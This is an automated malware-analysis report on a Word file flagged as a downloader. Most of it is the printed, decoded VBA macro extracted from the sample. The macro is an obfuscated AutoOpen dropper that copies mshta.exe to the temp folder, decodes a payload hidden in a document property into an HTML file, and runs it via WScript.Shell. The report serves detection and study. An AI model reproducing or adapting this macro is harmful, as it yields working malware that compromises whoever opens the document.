MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + abWLx + "ell").run(aVOhvn) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
afeyp4 = Environ(a5rab3) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8750 bytes |
SHA-256: 50ced68c8a96d82d42c9232bbcd535d70574783560726fd7e7a873dd73c6353c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aic5CJ"
Sub AutoOpen()
' Answerable changelog transfiguration
aOHif
End Sub
Attribute VB_Name = "axPB65"
Public Const apE3q As String = ""
Public Const aH8xm As Integer = 16445 / 1265
Public Const aRZcb As String = "1ridn1iw1"
Public Const aFtIw As String = "231met1sys1"
Public Const ahAkM As String = "p1m1e1t"
Public Const abWLx As String = "cript.sh"
Function aOgZf()
' Blizzard transcripts stepdaughter
End Function
Sub abh0Rg(ayobI)
' Freeware specify floors
' Ultimatum georgie plaid tubular
' Lengthen
' Pungent medline
' Conscript botswana chloe fetus
' Excess
' Maynt conclude registration marks column cl
' Gad sydney notified remark flimsy rock
' Gibson shred
' Wound diesel project
' Largest indoor
' Coolie dancing acutely gut
' Capillary transcripts
' Scurry occupant quilt
' Cornell
' Reid clinton
' Centaur invitations rand corroborate terminology
' Humanitarian tarnish
' Love-making pants arrival
' Favourites stations
' Enabled apocryphal tarried dd
' Remorseless ver misuse
' Interstate verdant accounts leather
' Pensions teas paper lookup
End Sub
Function a7A5mZ(aYKmU)
' Electoral tomatoes prevention fairy
' Rubicon belfast
' Roumania laggard
' Shewn memorabilia chute
' Mia florin
' Cherub
' Dannie
' Gcc laymen ambien hot unrestrained
' Company configuration pty crowbar
' Scythe
' Importune
' Ferrara diameter stewed
a7A5mZ = ActiveDocument.BuiltInDocumentProperties(aYKmU)
End Function
Public Sub aUu1c()
' Alternatively cordova chauffeur
azUoNF
End Sub
Public Sub adHaP()
aPENSZ
End Sub
Attribute VB_Name = "alWwTK"
Public Function a6dgm(ar7Szd, acerN)
' Bated topless
' Bankrupt chairman cameras virtue
' Discussion webcams
' Julia gazette
' Unbalanced loves efficient findings
' Macintosh coasted candor helpful queries
' Measurement student bevis opposite
' Earthen speaker miami forge default
' Influence hu
' Basis dylan subjugate rating goodbye torpid
' Retained charges
' Rebate repudiated
' Preliminary lutheran constituting
' Aud soil wang quantitative mali
' Prisoners Word cop
' Ground patrician inscrutable
' Shingle ce chuck valparaiso
' Eater broadside nave profession
' Devotedness stupefaction ninety-two applaud
' Suggestions sift publish
' Contracts episodes wrote
' Yield liberals provencal roads
FileNumber = FreeFile
Open ar7Szd For Output As #FileNumber
Print #FileNumber, acerN
Close #FileNumber
End Function
Sub aHw7d(aS3y1x, aArxj)
' Disabled
' Concierge hepatitis
' Meteoric chapel spellbound voiceless
' Tapers
' Licensed beginner twitch masonic
' Phil yawl
' Carb economically ethereal fourth quondam
' Specialist intention plan clematis
' Jerkin midway frustrate earliest inflated
' Oc providence waning urban bryan
' Catechism gallery
' Mother-of-pearl dyou
' Wheat
' Paul patterns gifts enquiry art
' Football rom gates
' Quince retro bishopric abatement garlic
' Honduras herodotus dominica johannes creates rhapsody
' Capitol
' Cone mobility textbook cold-blooded
' Warm gratis wonder varied
' Settle deserter tilt levity
' Cower query hypocritical
' Surely convenience colonial
' Ascii wrench diablo
' Broadest saved encryption washington reflection
' Doff jenny legislative pronunciation
' Outstanding antigua forty-two gland
' Dissemble wayward elapse biological
' Graph gnome fewest ambergris disable thrash
' Ba secretive pertain conch mediocrity
' Flagrant firstly
' Aurora factotum bruges muff
' Margarita fighters yearling recovery
' Equip effusive
' Assassins kit
FileCopy aS3y1x, aArxj
End Sub
Function aUC96B(aNJM1A)
' Null arrived
aUC96B = aNJM1A
End Function
Function adGbP(aNJM1A) As String
Dim aYrRzA As Long
Dim apIrW As Integer
Dim a19fKw As Integer
For aYrRzA = 1 To Len(aNJM1A)
' Artemis cycles vhs promoted
a19fKw = 0
' Lustily questionnaire
a78Sq = Mid(aNJM1A, aYrRzA, 1)
' Joe flop viper chunk
apIrW = Asc(a78Sq)
' Granddaughter messaging viewer
' Unfriendly functions
' Switching configuration hayes cultural
' Studious answer broken
' Stopped witnesses unpremeditated obsession scroll deny
' Gaudy telecom prodigy
' Convocation parallel
' Mpg brewed
' Hull elections stilled
' Registration studio
' Ec all-embracing
If (apIrW > ah7ovz(30208 / 30208) And apIrW < ah7ovz(32164 / 16082)) Or (apIrW > ah7ovz(6382 - 6379) And apIrW < ah7ovz(27316 / 6829)) Then
a19fKw = aH8xm
' Custom cope returns
' Aloofness catholic including groove
' Sudan tripoli
' Knead drier
' Honest falter gorse hypnotism
' Bet elucidation magnify waterproof endorsement
' Diphtheria
' Instrumental maintaining
' Interaction
' Inverse
' Ericsson samaria
apIrW = aucpr(apIrW, a19fKw)
If apIrW < ah7ovz(5) And apIrW > 83 Then
apIrW = adeKx(apIrW)
ElseIf apIrW < 28990 / 446 Then
apIrW = adeKx(apIrW)
End If
End If
aXC0E = acIr6(apIrW)
Mid$(aNJM1A, aYrRzA, 1) = aUC96B(aXC0E)
Next aYrRzA
adGbP = aNJM1A
End Function
Attribute VB_Name = "a5uhVb"
Function a20NBn(aSMOn)
' Geraldine msn burner schooling conducted
aso3BJ = aSMOn
asr8Oe = Len(aso3BJ)
For aYWGIm = 0 To asr8Oe - 1
' Fussy
' Hard queue coerced offal
' Coding
' Chaldean shopkeeper rpm
' Monty closes typically depend
' Means shingles
' Signed testing pr suzanne
' Pessimistic respect broomstick
' Outline nitrogen belly
' Possibility batteries sleeve
' Tacks trooper filipino vibrating cancer
' Eradicate lucerne mastiff incentive
' Lap readers erotic
' Anomaly paganism belt
' Ns apace
' Respond
' Ribald
' Draft authentication chrome right yawn
' Jointed inches emergency
' Roll onlooker adorer
' Worst feelings claim trustees iceland
a1dWoc = a1dWoc & Mid(aso3BJ, (asr8Oe - aYWGIm), 1)
Next aYWGIm
a20NBn = a1dWoc
End Function
Public Function aOMv0(a0bodD)
aOMv0 = Replace(a0bodD, apE3q, "")
End Function
Sub aOHif()
aUu1c
' Seventy-two queue accent madagascar closeted
' Functioning prepare encumber incubation roe nudist
' Performer
' Examine instructors
' Madhouse
' Perverted suave
' Rover marbles alpha
' Surf espn
' Criteria
' Lists bribery plash
' Cited exasperate eyesight hemlock earliest beatles
adHaP
Call CreateObject("ws" + abWLx + "ell").run(aVOhvn)
End Sub
Attribute VB_Name = "ab9WVe"
Function afeyp4(a5rab3)
afeyp4 = Environ(a5rab3)
End Function
Function aLk0KI()
With Application
aLk0KI = .PathSeparator
End With
End Function
Function afbry(aiEyT)
' Primarily cocks
ayI1o8 = VBA.Split(a20NBn("lmth.ni|moc.ni|exe.athsm"), "|")
' Prostores navigable centurion
' Respected
' Demoniacal hours discursive rhinoceros cocktail bool
' Infirmity
' Brandenburg intrepidity insincere enquiry
' Harassment complacency
' Wetting unbelievable angeles sever portugal displace
' Negligible preposition conservatory
' Increases
' Syrup
' Phlegmatic weal cosy tick papal
' Latin puerile renewable bars induction recruited
' Manhattan sponsors producers
' Intercept centuries kennels
Select Case aiEyT
Case 0:
afbry = afeyp4(Replace(a20NBn(aRZcb), "1", "")) & aLk0KI & Replace(a20NBn(aFtIw), "1", "") & aLk0KI & ayI1o8(0)
' Catalog
Case 1:
' Franchise planes malpractice ailing rugs
afbry = afeyp4(Replace(a20NBn(ahAkM), "1", "")) & aLk0KI & ayI1o8(1)
' Star hello
Case 2:
afbry = afeyp4(Replace(a20NBn(ahAkM), "1", "")) & aLk0KI & ayI1o8(2)
End Select
End Function
Sub aPENSZ()
aEdFx = aMVtL(afbry(2))
a6dgm aEdFx, adGbP(a7A5mZ("category"))
End Sub
Attribute VB_Name = "agqXKM"
Function apfh4R(anr5ej)
apfh4R = (aOMv0(anr5ej))
End Function
Function a0FDgf(aGOKqk)
a0FDgf = (aOMv0(aGOKqk))
End Function
Function aMVtL(aqUf2)
aMVtL = (aOMv0(aqUf2))
End Function
Function aVOhvn()
aObjq = a0FDgf(afbry(1))
aJvHOa = aMVtL(afbry(2))
aVOhvn = aObjq & " " & aJvHOa
End Function
Attribute VB_Name = "aVQoGT"
Sub azUoNF()
aCacS = apfh4R(afbry(0))
aLXGo = a0FDgf(afbry(1))
aHw7d aCacS, aLXGo
End Sub
Function adeKx(aBcUG)
adeKx = aBcUG + 23010 / 885
End Function
Function ah7ovz(aSp34M)
If aSp34M = 0 Then
ah7ovz = 28824 - 28823
ElseIf aSp34M = 1 Then
ah7ovz = 10624 / 166
ElseIf aSp34M = 2 Then
ah7ovz = -59 + 150
ElseIf aSp34M = 3 Then
ah7ovz = 115 - 19
ElseIf aSp34M = 4 Then
ah7ovz = -16 + 139
ElseIf aSp34M = 5 Then
ah7ovz = 182 - 85
Else
ah7ovz = 1024 * 1
End If
End Function
Function aucpr(aBcUG, auQ3PD)
aucpr = aBcUG - auQ3PD
End Function
Function acIr6(aBcUG)
acIr6 = VBA.ChrW(aBcUG)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 43008 bytes |
SHA-256: d418c194dbce05ec67ad6d32f113340f36f7b1d325b4304bd77a910d66964fe2 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.